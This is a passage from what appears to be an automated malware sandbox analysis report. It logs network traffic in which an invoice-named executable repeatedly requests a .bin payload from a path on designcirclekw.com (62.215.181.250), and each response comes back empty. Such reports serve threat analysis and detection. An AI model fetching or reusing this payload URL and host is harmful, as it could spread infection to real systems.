                                                                    Oct 29, 2024 20:39:13.830635071 CET4435002562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:14.647975922 CET4435002562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:14.648073912 CET50025443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:14.648130894 CET4435002562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:14.648169041 CET50025443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:14.648181915 CET50025443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:14.648190975 CET4435002562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:14.648216009 CET50025443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:14.648230076 CET50025443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:14.758964062 CET50026443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:14.759018898 CET4435002662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:14.759088039 CET50026443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:14.759356976 CET50026443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:14.759371042 CET4435002662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:15.767827034 CET4435002662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:15.767924070 CET50026443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:15.768444061 CET50026443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:15.768454075 CET4435002662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:15.768615007 CET50026443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:15.768620014 CET4435002662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:16.576288939 CET4435002662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:16.576426029 CET50026443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:16.576525927 CET50026443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:16.576570034 CET4435002662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:16.576622009 CET50026443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:16.696125984 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:16.696188927 CET4435002762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:16.696271896 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:16.696707964 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:16.696722984 CET4435002762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:17.688992977 CET4435002762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:17.689100027 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:17.691116095 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:17.691124916 CET4435002762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:17.691391945 CET4435002762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:17.691452980 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:17.691770077 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:17.739341974 CET4435002762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:19.269982100 CET4435002762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:19.270126104 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:19.270133018 CET4435002762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:19.270184994 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:19.270288944 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:19.270308018 CET4435002762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:19.270337105 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:19.270361900 CET50027443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:19.383668900 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:19.383713007 CET4435002862.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:19.383821011 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:19.384098053 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:19.384109974 CET4435002862.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:20.373794079 CET4435002862.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:20.373909950 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:20.374553919 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:20.374562979 CET4435002862.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:20.374663115 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:20.374667883 CET4435002862.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:21.199966908 CET4435002862.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:21.200043917 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:21.200059891 CET4435002862.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:21.200087070 CET4435002862.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:21.200102091 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:21.200141907 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:21.200161934 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:21.200161934 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:21.200181961 CET4435002862.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:21.200227976 CET50028443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:21.305907965 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:21.305975914 CET4435002962.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:21.306040049 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:21.306318045 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:21.306332111 CET4435002962.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:22.305331945 CET4435002962.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:22.310187101 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:22.312527895 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:22.312540054 CET4435002962.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:22.312793016 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:22.312798023 CET4435002962.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:23.130494118 CET4435002962.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:23.130564928 CET4435002962.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:23.130577087 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:23.130606890 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:23.130712986 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:23.130733013 CET4435002962.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:23.130744934 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:23.130776882 CET50029443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:23.243129015 CET50030443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:23.243180990 CET4435003062.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:23.243385077 CET50030443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:23.243729115 CET50030443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:23.243746996 CET4435003062.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:24.233879089 CET4435003062.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:24.236351967 CET50030443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:24.236871958 CET50030443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:24.236884117 CET4435003062.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:24.237042904 CET50030443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:24.237046957 CET4435003062.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:25.031982899 CET4435003062.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:25.032056093 CET4435003062.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:25.032411098 CET50030443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:25.046250105 CET50030443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:25.046279907 CET4435003062.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:25.046294928 CET50030443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:25.049146891 CET50030443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:25.169712067 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:25.169790983 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:25.169920921 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:25.170221090 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:25.170238018 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:26.191731930 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:26.191888094 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:26.192784071 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:26.192799091 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:26.192965031 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:26.192970991 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:27.014460087 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:27.014517069 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:27.014533043 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:27.014578104 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:29.695516109 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:29.695570946 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:29.695588112 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:29.695621967 CET50031443192.168.2.862.215.181.250

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 29, 2024 20:37:33.382989883 CET5865253192.168.2.81.1.1.1
                                                                    Oct 29, 2024 20:37:33.418777943 CET53586521.1.1.1192.168.2.8

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Oct 29, 2024 20:37:33.382989883 CET192.168.2.81.1.1.10x56b7Standard query (0)designcirclekw.comA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Oct 29, 2024 20:37:33.418777943 CET1.1.1.1192.168.2.80x56b7No error (0)designcirclekw.com62.215.181.250A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • designcirclekw.com

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.84997662.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:34 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:35 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:35 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.84997762.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:36 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:37 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:37 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.84997862.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:38 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:39 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:39 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.84997962.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:40 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:41 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:40 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.84998062.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:42 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:43 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:42 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.84998162.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:44 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:45 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:44 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.84998262.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:46 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:47 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:46 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.84998362.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:48 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:49 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:48 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.84998462.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:50 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:51 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:50 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.84998562.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:52 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:53 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:52 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.84998662.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:54 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:55 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:54 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.84998762.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:56 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:57 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:56 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.84998862.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:37:58 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:37:59 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:37:58 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.84998962.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:00 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:01 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:00 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.84999062.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:02 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:03 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:02 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.84999162.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:05 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:06 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:05 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.84999262.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:07 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:08 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:07 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.84999362.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:09 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:10 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:09 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.84999462.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:11 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:12 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:11 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.84999562.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:13 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
